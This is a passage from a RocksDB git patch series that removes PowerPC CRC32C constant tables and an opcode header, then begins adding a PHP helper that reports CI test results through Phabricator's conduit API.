- - /* x^196608 mod p(x)` << 1, x^196672 mod p(x)` << 1 */ - .octa 0x00000000ca0b28a000000001f797431c - - /* x^195584 mod p(x)` << 1, x^195648 mod p(x)` << 1 */ - .octa 0x00000001928e30a20000000053e989ba - - /* x^194560 mod p(x)` << 1, x^194624 mod p(x)` << 1 */ - .octa 0x0000000097b1b002000000003920cd16 - - /* x^193536 mod p(x)` << 1, x^193600 mod p(x)` << 1 */ - .octa 0x00000000b15bf90600000001e6f579b8 - - /* x^192512 mod p(x)` << 1, x^192576 mod p(x)` << 1 */ - .octa 0x00000000411c5d52000000007493cb0a - - /* x^191488 mod p(x)` << 1, x^191552 mod p(x)` << 1 */ - .octa 0x00000001c36f330000000001bdd376d8 - - /* x^190464 mod p(x)` << 1, x^190528 mod p(x)` << 1 */ - .octa 0x00000001119227e0000000016badfee6 - - /* x^189440 mod p(x)` << 1, x^189504 mod p(x)` << 1 */ - .octa 0x00000000114d47020000000071de5c58 - - /* x^188416 mod p(x)` << 1, x^188480 mod p(x)` << 1 */ - .octa 0x00000000458b5b9800000000453f317c - - /* x^187392 mod p(x)` << 1, x^187456 mod p(x)` << 1 */ - .octa 0x000000012e31fb8e0000000121675cce - - /* x^186368 mod p(x)` << 1, x^186432 mod p(x)` << 1 */ - .octa 0x000000005cf619d800000001f409ee92 - - /* x^185344 mod p(x)` << 1, x^185408 mod p(x)` << 1 */ - .octa 0x0000000063f4d8b200000000f36b9c88 - - /* x^184320 mod p(x)` << 1, x^184384 mod p(x)` << 1 */ - .octa 0x000000004138dc8a0000000036b398f4 - - /* x^183296 mod p(x)` << 1, x^183360 mod p(x)` << 1 */ - .octa 0x00000001d29ee8e000000001748f9adc - - /* x^182272 mod p(x)` << 1, x^182336 mod p(x)` << 1 */ - .octa 0x000000006a08ace800000001be94ec00 - - /* x^181248 mod p(x)` << 1, x^181312 mod p(x)` << 1 */ - .octa 0x0000000127d4201000000000b74370d6 - - /* x^180224 mod p(x)` << 1, x^180288 mod p(x)` << 1 */ - .octa 0x0000000019d76b6200000001174d0b98 - - /* x^179200 mod p(x)` << 1, x^179264 mod p(x)` << 1 */ - .octa 0x00000001b1471f6e00000000befc06a4 - - /* x^178176 mod p(x)` << 1, x^178240 mod p(x)` << 1 */ - .octa 0x00000001f64c19cc00000001ae125288 - - /* x^177152 mod p(x)` << 1, x^177216 mod p(x)` << 1 */ - .octa 0x00000000003c0ea00000000095c19b34 - - /* x^176128 mod p(x)` << 1, x^176192 mod p(x)` << 1 */ - .octa 0x000000014d73abf600000001a78496f2 - - /* x^175104 mod p(x)` << 1, x^175168 mod p(x)` << 1 */ - .octa 0x00000001620eb84400000001ac5390a0 - - /* x^174080 mod p(x)` << 1, x^174144 mod p(x)` << 1 */ - .octa 0x0000000147655048000000002a80ed6e - - /* x^173056 mod p(x)` << 1, x^173120 mod p(x)` << 1 */ - .octa 0x0000000067b5077e00000001fa9b0128 - - /* x^172032 mod p(x)` << 1, x^172096 mod p(x)` << 1 */ - .octa 0x0000000010ffe20600000001ea94929e - - /* x^171008 mod p(x)` << 1, x^171072 mod p(x)` << 1 */ - .octa 0x000000000fee8f1e0000000125f4305c - - /* x^169984 mod p(x)` << 1, x^170048 mod p(x)` << 1 */ - .octa 0x00000001da26fbae00000001471e2002 - - /* x^168960 mod p(x)` << 1, x^169024 mod p(x)` << 1 */ - .octa 0x00000001b3a8bd880000000132d2253a - - /* x^167936 mod p(x)` << 1, x^168000 mod p(x)` << 1 */ - .octa 0x00000000e8f3898e00000000f26b3592 - - /* x^166912 mod p(x)` << 1, x^166976 mod p(x)` << 1 */ - .octa 0x00000000b0d0d28c00000000bc8b67b0 - - /* x^165888 mod p(x)` << 1, x^165952 mod p(x)` << 1 */ - .octa 0x0000000030f2a798000000013a826ef2 - - /* x^164864 mod p(x)` << 1, x^164928 mod p(x)` << 1 */ - .octa 0x000000000fba10020000000081482c84 - - /* x^163840 mod p(x)` << 1, x^163904 mod p(x)` << 1 */ - .octa 0x00000000bdb9bd7200000000e77307c2 - - /* x^162816 mod p(x)` << 1, x^162880 mod p(x)` << 1 */ - .octa 0x0000000075d3bf5a00000000d4a07ec8 - - /* x^161792 mod p(x)` << 1, x^161856 mod p(x)` << 1 */ - .octa 0x00000000ef1f98a00000000017102100 - - /* x^160768 mod p(x)` << 1, x^160832 mod p(x)` << 1 */ - .octa 0x00000000689c760200000000db406486 - - /* x^159744 mod p(x)` << 1, x^159808 mod p(x)` << 1 */ - .octa 0x000000016d5fa5fe0000000192db7f88 - - /* x^158720 mod p(x)` << 1, x^158784 mod p(x)` << 1 */ - .octa 0x00000001d0d2b9ca000000018bf67b1e - - /* x^157696 mod p(x)` << 1, x^157760 mod p(x)` << 1 */ - .octa 0x0000000041e7b470000000007c09163e - - /* x^156672 mod p(x)` << 1, x^156736 mod p(x)` << 1 */ - .octa 0x00000001cbb6495e000000000adac060 - - /* x^155648 mod p(x)` << 1, x^155712 mod p(x)` << 1 */ - .octa 0x000000010052a0b000000000bd8316ae - - /* x^154624 mod p(x)` << 1, x^154688 mod p(x)` << 1 */ - .octa 0x00000001d8effb5c000000019f09ab54 - - /* x^153600 mod p(x)` << 1, x^153664 mod p(x)` << 1 */ - .octa 0x00000001d969853c0000000125155542 - - /* x^152576 mod p(x)` << 1, x^152640 mod p(x)` << 1 */ - .octa 0x00000000523ccce2000000018fdb5882 - - /* x^151552 mod p(x)` << 1, x^151616 mod p(x)` << 1 */ - .octa 0x000000001e2436bc00000000e794b3f4 - - /* x^150528 mod p(x)` << 1, x^150592 mod p(x)` << 1 */ - .octa 0x00000000ddd1c3a2000000016f9bb022 - - /* x^149504 mod p(x)` << 1, x^149568 mod p(x)` << 1 */ - .octa 0x0000000019fcfe3800000000290c9978 - - /* x^148480 mod p(x)` << 1, x^148544 mod p(x)` << 1 */ - .octa 0x00000001ce95db640000000083c0f350 - - /* x^147456 mod p(x)` << 1, x^147520 mod p(x)` << 1 */ - .octa 0x00000000af5828060000000173ea6628 - - /* x^146432 mod p(x)` << 1, x^146496 mod p(x)` << 1 */ - .octa 0x00000001006388f600000001c8b4e00a - - /* x^145408 mod p(x)` << 1, x^145472 mod p(x)` << 1 */ - .octa 0x0000000179eca00a00000000de95d6aa - - /* x^144384 mod p(x)` << 1, x^144448 mod p(x)` << 1 */ - .octa 0x0000000122410a6a000000010b7f7248 - - /* x^143360 mod p(x)` << 1, x^143424 mod p(x)` << 1 */ - .octa 0x000000004288e87c00000001326e3a06 - - /* x^142336 mod p(x)` << 1, x^142400 mod p(x)` << 1 */ - .octa 0x000000016c5490da00000000bb62c2e6 - - /* x^141312 mod p(x)` << 1, x^141376 mod p(x)` << 1 */ - .octa 0x00000000d1c71f6e0000000156a4b2c2 - - /* x^140288 mod p(x)` << 1, x^140352 mod p(x)` << 1 */ - .octa 0x00000001b4ce08a6000000011dfe763a - - /* x^139264 mod p(x)` << 1, x^139328 mod p(x)` << 1 */ - .octa 0x00000001466ba60c000000007bcca8e2 - - /* x^138240 mod p(x)` << 1, x^138304 mod p(x)` << 1 */ - .octa 0x00000001f6c488a40000000186118faa - - /* x^137216 mod p(x)` << 1, x^137280 mod p(x)` << 1 */ - .octa 0x000000013bfb06820000000111a65a88 - - /* x^136192 mod p(x)` << 1, x^136256 mod p(x)` << 1 */ - .octa 0x00000000690e9e54000000003565e1c4 - - /* x^135168 mod p(x)` << 1, x^135232 mod p(x)` << 1 */ - .octa 0x00000000281346b6000000012ed02a82 - - /* x^134144 mod p(x)` << 1, x^134208 mod p(x)` << 1 */ - .octa 0x000000015646402400000000c486ecfc - - /* x^133120 mod p(x)` << 1, x^133184 mod p(x)` << 1 */ - .octa 0x000000016063a8dc0000000001b951b2 - - /* x^132096 mod p(x)` << 1, x^132160 mod p(x)` << 1 */ - .octa 0x0000000116a663620000000048143916 - - /* x^131072 mod p(x)` << 1, x^131136 mod p(x)` << 1 */ - .octa 0x000000017e8aa4d200000001dc2ae124 - - /* x^130048 mod p(x)` << 1, x^130112 mod p(x)` << 1 */ - .octa 0x00000001728eb10c00000001416c58d6 - - /* x^129024 mod p(x)` << 1, x^129088 mod p(x)` << 1 */ - .octa 0x00000001b08fd7fa00000000a479744a - - /* x^128000 mod p(x)` << 1, x^128064 mod p(x)` << 1 */ - .octa 0x00000001092a16e80000000096ca3a26 - - /* x^126976 mod p(x)` << 1, x^127040 mod p(x)` << 1 */ - .octa 0x00000000a505637c00000000ff223d4e - - /* x^125952 mod p(x)` << 1, x^126016 mod p(x)` << 1 */ - .octa 0x00000000d94869b2000000010e84da42 - - /* x^124928 mod p(x)` << 1, x^124992 mod p(x)` << 1 */ - .octa 0x00000001c8b203ae00000001b61ba3d0 - - /* x^123904 mod p(x)` << 1, x^123968 mod p(x)` << 1 */ - .octa 0x000000005704aea000000000680f2de8 - - /* x^122880 mod p(x)` << 1, x^122944 mod p(x)` << 1 */ - .octa 0x000000012e295fa2000000008772a9a8 - - /* x^121856 mod p(x)` << 1, x^121920 mod p(x)` << 1 */ - .octa 0x000000011d0908bc0000000155f295bc - - /* x^120832 mod p(x)` << 1, x^120896 mod p(x)` << 1 */ - .octa 0x0000000193ed97ea00000000595f9282 - - /* x^119808 mod p(x)` << 1, x^119872 mod p(x)` << 1 */ - .octa 0x000000013a0f1c520000000164b1c25a - - /* x^118784 mod p(x)` << 1, x^118848 mod p(x)` << 1 */ - .octa 0x000000010c2c40c000000000fbd67c50 - - /* x^117760 mod p(x)` << 1, x^117824 mod p(x)` << 1 */ - .octa 0x00000000ff6fac3e0000000096076268 - - /* x^116736 mod p(x)` << 1, x^116800 mod p(x)` << 1 */ - .octa 0x000000017b3609c000000001d288e4cc - - /* x^115712 mod p(x)` << 1, x^115776 mod p(x)` << 1 */ - .octa 0x0000000088c8c92200000001eaac1bdc - - /* x^114688 mod p(x)` << 1, x^114752 mod p(x)` << 1 */ - .octa 0x00000001751baae600000001f1ea39e2 - - /* x^113664 mod p(x)` << 1, x^113728 mod p(x)` << 1 */ - .octa 0x000000010795297200000001eb6506fc - - /* x^112640 mod p(x)` << 1, x^112704 mod p(x)` << 1 */ - .octa 0x0000000162b00abe000000010f806ffe - - /* x^111616 mod p(x)` << 1, x^111680 mod p(x)` << 1 */ - .octa 0x000000000d7b404c000000010408481e - - /* x^110592 mod p(x)` << 1, x^110656 mod p(x)` << 1 */ - .octa 0x00000000763b13d40000000188260534 - - /* x^109568 mod p(x)` << 1, x^109632 mod p(x)` << 1 */ - .octa 0x00000000f6dc22d80000000058fc73e0 - - /* x^108544 mod p(x)` << 1, x^108608 mod p(x)` << 1 */ - .octa 0x000000007daae06000000000391c59b8 - - /* x^107520 mod p(x)` << 1, x^107584 mod p(x)` << 1 */ - .octa 0x000000013359ab7c000000018b638400 - - /* x^106496 mod p(x)` << 1, x^106560 mod p(x)` << 1 */ - .octa 0x000000008add438a000000011738f5c4 - - /* x^105472 mod p(x)` << 1, x^105536 mod p(x)` << 1 */ - .octa 0x00000001edbefdea000000008cf7c6da - - /* x^104448 mod p(x)` << 1, x^104512 mod p(x)` << 1 */ - .octa 0x000000004104e0f800000001ef97fb16 - - /* x^103424 mod p(x)` << 1, x^103488 mod p(x)` << 1 */ - .octa 0x00000000b48a82220000000102130e20 - - /* x^102400 mod p(x)` << 1, x^102464 mod p(x)` << 1 */ - .octa 0x00000001bcb4684400000000db968898 - - /* x^101376 mod p(x)` << 1, x^101440 mod p(x)` << 1 */ - .octa 0x000000013293ce0a00000000b5047b5e - - /* x^100352 mod p(x)` << 1, x^100416 mod p(x)` << 1 */ - .octa 0x00000001710d0844000000010b90fdb2 - - /* x^99328 mod p(x)` << 1, x^99392 mod p(x)` << 1 */ - .octa 0x0000000117907f6e000000004834a32e - - /* x^98304 mod p(x)` << 1, x^98368 mod p(x)` << 1 */ - .octa 0x0000000087ddf93e0000000059c8f2b0 - - /* x^97280 mod p(x)` << 1, x^97344 mod p(x)` << 1 */ - .octa 0x000000005970e9b00000000122cec508 - - /* x^96256 mod p(x)` << 1, x^96320 mod p(x)` << 1 */ - .octa 0x0000000185b2b7d0000000000a330cda - - /* x^95232 mod p(x)` << 1, x^95296 mod p(x)` << 1 */ - .octa 0x00000001dcee0efc000000014a47148c - - /* x^94208 mod p(x)` << 1, x^94272 mod p(x)` << 1 */ - .octa 0x0000000030da27220000000042c61cb8 - - /* x^93184 mod p(x)` << 1, x^93248 mod p(x)` << 1 */ - .octa 0x000000012f925a180000000012fe6960 - - /* x^92160 mod p(x)` << 1, x^92224 mod p(x)` << 1 */ - .octa 0x00000000dd2e357c00000000dbda2c20 - - /* x^91136 mod p(x)` << 1, x^91200 mod p(x)` << 1 */ - .octa 0x00000000071c80de000000011122410c - - /* x^90112 mod p(x)` << 1, x^90176 mod p(x)` << 1 */ - .octa 0x000000011513140a00000000977b2070 - - /* x^89088 mod p(x)` << 1, x^89152 mod p(x)` << 1 */ - .octa 0x00000001df876e8e000000014050438e - - /* x^88064 mod p(x)` << 1, x^88128 mod p(x)` << 1 */ - .octa 0x000000015f81d6ce0000000147c840e8 - - /* x^87040 mod p(x)` << 1, x^87104 mod p(x)` << 1 */ - .octa 0x000000019dd94dbe00000001cc7c88ce - - /* x^86016 mod p(x)` << 1, x^86080 mod p(x)` << 1 */ - .octa 0x00000001373d206e00000001476b35a4 - - /* x^84992 mod p(x)` << 1, x^85056 mod p(x)` << 1 */ - .octa 0x00000000668ccade000000013d52d508 - - /* x^83968 mod p(x)` << 1, x^84032 mod p(x)` << 1 */ - .octa 0x00000001b192d268000000008e4be32e - - /* x^82944 mod p(x)` << 1, x^83008 mod p(x)` << 1 */ - .octa 0x00000000e30f3a7800000000024120fe - - /* x^81920 mod p(x)` << 1, x^81984 mod p(x)` << 1 */ - .octa 0x000000010ef1f7bc00000000ddecddb4 - - /* x^80896 mod p(x)` << 1, x^80960 mod p(x)` << 1 */ - .octa 0x00000001f5ac738000000000d4d403bc - - /* x^79872 mod p(x)` << 1, x^79936 mod p(x)` << 1 */ - .octa 0x000000011822ea7000000001734b89aa - - /* x^78848 mod p(x)` << 1, x^78912 mod p(x)` << 1 */ - .octa 0x00000000c3a33848000000010e7a58d6 - - /* x^77824 mod p(x)` << 1, x^77888 mod p(x)` << 1 */ - .octa 0x00000001bd151c2400000001f9f04e9c - - /* x^76800 mod p(x)` << 1, x^76864 mod p(x)` << 1 */ - .octa 0x0000000056002d7600000000b692225e - - /* x^75776 mod p(x)` << 1, x^75840 mod p(x)` << 1 */ - .octa 0x000000014657c4f4000000019b8d3f3e - - /* x^74752 mod p(x)` << 1, x^74816 mod p(x)` << 1 */ - .octa 0x0000000113742d7c00000001a874f11e - - /* x^73728 mod p(x)` << 1, x^73792 mod p(x)` << 1 */ - .octa 0x000000019c5920ba000000010d5a4254 - - /* x^72704 mod p(x)` << 1, x^72768 mod p(x)` << 1 */ - .octa 0x000000005216d2d600000000bbb2f5d6 - - /* x^71680 mod p(x)` << 1, x^71744 mod p(x)` << 1 */ - .octa 0x0000000136f5ad8a0000000179cc0e36 - - /* x^70656 mod p(x)` << 1, x^70720 mod p(x)` << 1 */ - .octa 0x000000018b07beb600000001dca1da4a - - /* x^69632 mod p(x)` << 1, x^69696 mod p(x)` << 1 */ - .octa 0x00000000db1e93b000000000feb1a192 - - /* x^68608 mod p(x)` << 1, x^68672 mod p(x)` << 1 */ - .octa 0x000000000b96fa3a00000000d1eeedd6 - - /* x^67584 mod p(x)` << 1, x^67648 mod p(x)` << 1 */ - .octa 0x00000001d9968af0000000008fad9bb4 - - /* x^66560 mod p(x)` << 1, x^66624 mod p(x)` << 1 */ - .octa 0x000000000e4a77a200000001884938e4 - - /* x^65536 mod p(x)` << 1, x^65600 mod p(x)` << 1 */ - .octa 0x00000000508c2ac800000001bc2e9bc0 - - /* x^64512 mod p(x)` << 1, x^64576 mod p(x)` << 1 */ - .octa 0x0000000021572a8000000001f9658a68 - - /* x^63488 mod p(x)` << 1, x^63552 mod p(x)` << 1 */ - .octa 0x00000001b859daf2000000001b9224fc - - /* x^62464 mod p(x)` << 1, x^62528 mod p(x)` << 1 */ - .octa 0x000000016f7884740000000055b2fb84 - - /* x^61440 mod p(x)` << 1, x^61504 mod p(x)` << 1 */ - .octa 0x00000001b438810e000000018b090348 - - /* x^60416 mod p(x)` << 1, x^60480 mod p(x)` << 1 */ - .octa 0x0000000095ddc6f2000000011ccbd5ea - - /* x^59392 mod p(x)` << 1, x^59456 mod p(x)` << 1 */ - .octa 0x00000001d977c20c0000000007ae47f8 - - /* x^58368 mod p(x)` << 1, x^58432 mod p(x)` << 1 */ - .octa 0x00000000ebedb99a0000000172acbec0 - - /* x^57344 mod p(x)` << 1, x^57408 mod p(x)` << 1 */ - .octa 0x00000001df9e9e9200000001c6e3ff20 - - /* x^56320 mod p(x)` << 1, x^56384 mod p(x)` << 1 */ - .octa 0x00000001a4a3f95200000000e1b38744 - - /* x^55296 mod p(x)` << 1, x^55360 mod p(x)` << 1 */ - .octa 0x00000000e2f5122000000000791585b2 - - /* x^54272 mod p(x)` << 1, x^54336 mod p(x)` << 1 */ - .octa 0x000000004aa01f3e00000000ac53b894 - - /* x^53248 mod p(x)` << 1, x^53312 mod p(x)` << 1 */ - .octa 0x00000000b3e90a5800000001ed5f2cf4 - - /* x^52224 mod p(x)` << 1, x^52288 mod p(x)` << 1 */ - .octa 0x000000000c9ca2aa00000001df48b2e0 - - /* x^51200 mod p(x)` << 1, x^51264 mod p(x)` << 1 */ - .octa 0x000000015168231600000000049c1c62 - - /* x^50176 mod p(x)` << 1, x^50240 mod p(x)` << 1 */ - .octa 0x0000000036fce78c000000017c460c12 - - /* x^49152 mod p(x)` << 1, x^49216 mod p(x)` << 1 */ - .octa 0x000000009037dc10000000015be4da7e - - /* x^48128 mod p(x)` << 1, x^48192 mod p(x)` << 1 */ - .octa 0x00000000d3298582000000010f38f668 - - /* x^47104 mod p(x)` << 1, x^47168 mod p(x)` << 1 */ - .octa 0x00000001b42e8ad60000000039f40a00 - - /* x^46080 mod p(x)` << 1, x^46144 mod p(x)` << 1 */ - .octa 0x00000000142a983800000000bd4c10c4 - - /* x^45056 mod p(x)` << 1, x^45120 mod p(x)` << 1 */ - .octa 0x0000000109c7f1900000000042db1d98 - - /* x^44032 mod p(x)` << 1, x^44096 mod p(x)` << 1 */ - .octa 0x0000000056ff931000000001c905bae6 - - /* x^43008 mod p(x)` << 1, x^43072 mod p(x)` << 1 */ - .octa 0x00000001594513aa00000000069d40ea - - /* x^41984 mod p(x)` << 1, x^42048 mod p(x)` << 1 */ - .octa 0x00000001e3b5b1e8000000008e4fbad0 - - /* x^40960 mod p(x)` << 1, x^41024 mod p(x)` << 1 */ - .octa 0x000000011dd5fc080000000047bedd46 - - /* x^39936 mod p(x)` << 1, x^40000 mod p(x)` << 1 */ - .octa 0x00000001675f0cc20000000026396bf8 - - /* x^38912 mod p(x)` << 1, x^38976 mod p(x)` << 1 */ - .octa 0x00000000d1c8dd4400000000379beb92 - - /* x^37888 mod p(x)` << 1, x^37952 mod p(x)` << 1 */ - .octa 0x0000000115ebd3d8000000000abae54a - - /* x^36864 mod p(x)` << 1, x^36928 mod p(x)` << 1 */ - .octa 0x00000001ecbd0dac0000000007e6a128 - - /* x^35840 mod p(x)` << 1, x^35904 mod p(x)` << 1 */ - .octa 0x00000000cdf67af2000000000ade29d2 - - /* x^34816 mod p(x)` << 1, x^34880 mod p(x)` << 1 */ - .octa 0x000000004c01ff4c00000000f974c45c - - /* x^33792 mod p(x)` << 1, x^33856 mod p(x)` << 1 */ - .octa 0x00000000f2d8657e00000000e77ac60a - - /* x^32768 mod p(x)` << 1, x^32832 mod p(x)` << 1 */ - .octa 0x000000006bae74c40000000145895816 - - /* x^31744 mod p(x)` << 1, x^31808 mod p(x)` << 1 */ - .octa 0x0000000152af8aa00000000038e362be - - /* x^30720 mod p(x)` << 1, x^30784 mod p(x)` << 1 */ - .octa 0x0000000004663802000000007f991a64 - - /* x^29696 mod p(x)` << 1, x^29760 mod p(x)` << 1 */ - .octa 0x00000001ab2f5afc00000000fa366d3a - - /* x^28672 mod p(x)` << 1, x^28736 mod p(x)` << 1 */ - .octa 0x0000000074a4ebd400000001a2bb34f0 - - /* x^27648 mod p(x)` << 1, x^27712 mod p(x)` << 1 */ - .octa 0x00000001d7ab3a4c0000000028a9981e - - /* x^26624 mod p(x)` << 1, x^26688 mod p(x)` << 1 */ - .octa 0x00000001a8da60c600000001dbc672be - - /* x^25600 mod p(x)` << 1, x^25664 mod p(x)` << 1 */ - .octa 0x000000013cf6382000000000b04d77f6 - - /* x^24576 mod p(x)` << 1, x^24640 mod p(x)` << 1 */ - .octa 0x00000000bec12e1e0000000124400d96 - - /* x^23552 mod p(x)` << 1, x^23616 mod p(x)` << 1 */ - .octa 0x00000001c6368010000000014ca4b414 - - /* x^22528 mod p(x)` << 1, x^22592 mod p(x)` << 1 */ - .octa 0x00000001e6e78758000000012fe2c938 - - /* x^21504 mod p(x)` << 1, x^21568 mod p(x)` << 1 */ - .octa 0x000000008d7f2b3c00000001faed01e6 - - /* x^20480 mod p(x)` << 1, x^20544 mod p(x)` << 1 */ - .octa 0x000000016b4a156e000000007e80ecfe - - /* x^19456 mod p(x)` << 1, x^19520 mod p(x)` << 1 */ - .octa 0x00000001c63cfeb60000000098daee94 - - /* x^18432 mod p(x)` << 1, x^18496 mod p(x)` << 1 */ - .octa 0x000000015f902670000000010a04edea - - /* x^17408 mod p(x)` << 1, x^17472 mod p(x)` << 1 */ - .octa 0x00000001cd5de11e00000001c00b4524 - - /* x^16384 mod p(x)` << 1, x^16448 mod p(x)` << 1 */ - .octa 0x000000001acaec540000000170296550 - - /* x^15360 mod p(x)` << 1, x^15424 mod p(x)` << 1 */ - .octa 0x000000002bd0ca780000000181afaa48 - - /* x^14336 mod p(x)` << 1, x^14400 mod p(x)` << 1 */ - .octa 0x0000000032d63d5c0000000185a31ffa - - /* x^13312 mod p(x)` << 1, x^13376 mod p(x)` << 1 */ - .octa 0x000000001c6d4e4c000000002469f608 - - /* x^12288 mod p(x)` << 1, x^12352 mod p(x)` << 1 */ - .octa 0x0000000106a60b92000000006980102a - - /* x^11264 mod p(x)` << 1, x^11328 mod p(x)` << 1 */ - .octa 0x00000000d3855e120000000111ea9ca8 - - /* x^10240 mod p(x)` << 1, x^10304 mod p(x)` << 1 */ - .octa 0x00000000e312563600000001bd1d29ce - - /* x^9216 mod p(x)` << 1, x^9280 mod p(x)` << 1 */ - .octa 0x000000009e8f7ea400000001b34b9580 - - /* x^8192 mod p(x)` << 1, x^8256 mod p(x)` << 1 */ - .octa 0x00000001c82e562c000000003076054e - - /* x^7168 mod p(x)` << 1, x^7232 mod p(x)` << 1 */ - .octa 0x00000000ca9f09ce000000012a608ea4 - - /* x^6144 mod p(x)` << 1, x^6208 mod p(x)` << 1 */ - .octa 0x00000000c63764e600000000784d05fe - - /* x^5120 mod p(x)` << 1, x^5184 mod p(x)` << 1 */ - .octa 0x0000000168d2e49e000000016ef0d82a - - /* x^4096 mod p(x)` << 1, x^4160 mod p(x)` << 1 */ - .octa 0x00000000e986c1480000000075bda454 - - /* x^3072 mod p(x)` << 1, x^3136 mod p(x)` << 1 */ - .octa 0x00000000cfb65894000000003dc0a1c4 - - /* x^2048 mod p(x)` << 1, x^2112 mod p(x)` << 1 */ - .octa 0x0000000111cadee400000000e9a5d8be - - /* x^1024 mod p(x)` << 1, x^1088 mod p(x)` << 1 */ - .octa 0x0000000171fb63ce00000001609bc4b4 - - .short_constants : - - /* Reduce final 1024-2048 bits to 64 bits, shifting 32 bits to include the - trailing 32 bits of zeros */ - /* x^1952 mod p(x)`, x^1984 mod p(x)`, x^2016 mod p(x)`, x^2048 mod p(x)` */ - .octa 0x7fec2963e5bf80485cf015c388e56f72 - - /* x^1824 mod p(x)`, x^1856 mod p(x)`, x^1888 mod p(x)`, x^1920 mod p(x)` */ - .octa 0x38e888d4844752a9963a18920246e2e6 - - /* x^1696 mod p(x)`, x^1728 mod p(x)`, x^1760 mod p(x)`, x^1792 mod p(x)` */ - .octa 0x42316c00730206ad419a441956993a31 - - /* x^1568 mod p(x)`, x^1600 mod p(x)`, x^1632 mod p(x)`, x^1664 mod p(x)` */ - .octa 0x543d5c543e65ddf9924752ba2b830011 - - /* x^1440 mod p(x)`, x^1472 mod p(x)`, x^1504 mod p(x)`, x^1536 mod p(x)` */ - .octa 0x78e87aaf56767c9255bd7f9518e4a304 - - /* x^1312 mod p(x)`, x^1344 mod p(x)`, x^1376 mod p(x)`, x^1408 mod p(x)` */ - .octa 0x8f68fcec1903da7f6d76739fe0553f1e - - /* x^1184 mod p(x)`, x^1216 mod p(x)`, x^1248 mod p(x)`, x^1280 mod p(x)` */ - .octa 0x3f4840246791d588c133722b1fe0b5c3 - - /* x^1056 mod p(x)`, x^1088 mod p(x)`, x^1120 mod p(x)`, x^1152 mod p(x)` */ - .octa 0x34c96751b04de25a64b67ee0e55ef1f3 - - /* x^928 mod p(x)`, x^960 mod p(x)`, x^992 mod p(x)`, x^1024 mod p(x)` */ - .octa 0x156c8e180b4a395b069db049b8fdb1e7 - - /* x^800 mod p(x)`, x^832 mod p(x)`, x^864 mod p(x)`, x^896 mod p(x)` */ - .octa 0xe0b99ccbe661f7bea11bfaf3c9e90b9e - - /* x^672 mod p(x)`, x^704 mod p(x)`, x^736 mod p(x)`, x^768 mod p(x)` */ - .octa 0x041d37768cd75659817cdc5119b29a35 - - /* x^544 mod p(x)`, x^576 mod p(x)`, x^608 mod p(x)`, x^640 mod p(x)` */ - .octa 0x3a0777818cfaa9651ce9d94b36c41f1c - - /* x^416 mod p(x)`, x^448 mod p(x)`, x^480 mod p(x)`, x^512 mod p(x)` */ - .octa 0x0e148e8252377a554f256efcb82be955 - - /* x^288 mod p(x)`, x^320 mod p(x)`, x^352 mod p(x)`, x^384 mod p(x)` */ - .octa 0x9c25531d19e65ddeec1631edb2dea967 - - /* x^160 mod p(x)`, x^192 mod p(x)`, x^224 mod p(x)`, x^256 mod p(x)` */ - .octa 0x790606ff9957c0a65d27e147510ac59a - - /* x^32 mod p(x)`, x^64 mod p(x)`, x^96 mod p(x)`, x^128 mod p(x)` */ - .octa 0x82f63b786ea2d55ca66805eb18b8ea18 - - .barrett_constants : - /* 33 bit reflected Barrett constant m - (4^32)/n */ - .octa 0x000000000000000000000000dea713f1 /* x^64 div p(x)` */ - /* 33 bit reflected Barrett constant n */ - .octa 0x00000000000000000000000105ec76f1 -#endif - -#endif diff --git a/util/ppc-opcode.h b/util/ppc-opcode.h deleted file mode 100644 index eeb0ae08ffc..00000000000 --- a/util/ppc-opcode.h +++ /dev/null @@ -1,31 +0,0 @@ -// Copyright (c) 2017 International Business Machines Corp. -// All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. - -#ifndef __OPCODES_H -#define __OPCODES_H - -#define __PPC_RA(a) (((a)&0x1f) << 16) -#define __PPC_RB(b) (((b)&0x1f) << 11) -#define __PPC_XA(a) ((((a)&0x1f) << 16) | (((a)&0x20) >> 3)) -#define __PPC_XB(b) ((((b)&0x1f) << 11) | (((b)&0x20) >> 4)) -#define __PPC_XS(s) ((((s)&0x1f) << 21) | (((s)&0x20) >> 5)) -#define __PPC_XT(s) __PPC_XS(s) -#define VSX_XX3(t, a, b) (__PPC_XT(t) | __PPC_XA(a) | __PPC_XB(b)) -#define VSX_XX1(s, a, b) (__PPC_XS(s) | __PPC_RA(a) | __PPC_RB(b)) - -#define PPC_INST_VPMSUMW 0x10000488 -#define PPC_INST_VPMSUMD 0x100004c8 -#define PPC_INST_MFVSRD 0x7c000066 -#define PPC_INST_MTVSRD 0x7c000166 - -#define VPMSUMW(t, a, b) .long PPC_INST_VPMSUMW | VSX_XX3((t), a, b) -#define VPMSUMD(t, a, b) .long PPC_INST_VPMSUMD | VSX_XX3((t), a, b) -#define MFVRD(a, t) .long PPC_INST_MFVSRD | VSX_XX1((t) + 32, a, 0) -#define MTVRD(t, a) .long PPC_INST_MTVSRD | VSX_XX1((t) + 32, a, 0) - -#endif From 3ce20e985b613134cb2683c0926f986a84974495 Mon Sep 17 00:00:00 2001 From: Andres Suarez Date: Wed, 26 Jul 2017 19:01:45 -0700 Subject: [PATCH 047/205] Fix use of RocksDBCommonHelper in cont_integration.sh Reviewed By: mzlee Differential Revision: D5472936 fbshipit-source-id: cf75858f879f1192b468a9020005634a5afad880 --- build_tools/RocksDBCommonHelper.php | 365 ++++++++++++++++++++++++++++ build_tools/cont_integration.sh | 2 +- 2 files changed, 366 insertions(+), 1 deletion(-) create mode 100644 build_tools/RocksDBCommonHelper.php diff --git a/build_tools/RocksDBCommonHelper.php b/build_tools/RocksDBCommonHelper.php new file mode 100644 index 00000000000..41d1e21738f --- /dev/null +++ b/build_tools/RocksDBCommonHelper.php @@ -0,0 +1,365 @@ + 0); + assert(is_numeric($diffID)); + assert(strlen($url) > 0); + + $cmd = 'echo \'{"diff_id": ' . $diffID . ', ' + . '"name":"click here for sandcastle tests for D' . $diffID . '", ' + . '"link":"' . $url . '"}\' | ' + . 'arc call-conduit ' + . 'differential.updateunitresults'; + shell_exec($cmd); +} + +function buildUpdateTestStatusCmd($diffID, $test, $status) { + assert(strlen($diffID) > 0); + assert(is_numeric($diffID)); + assert(strlen($test) > 0); + assert(strlen($status) > 0); + + $cmd = 'echo \'{"diff_id": ' . $diffID . ', ' + . '"name":"' . $test . '", ' + . '"result":"' . $status . '"}\' | ' + . 'arc call-conduit ' + . 'differential.updateunitresults'; + return $cmd; +} + +function 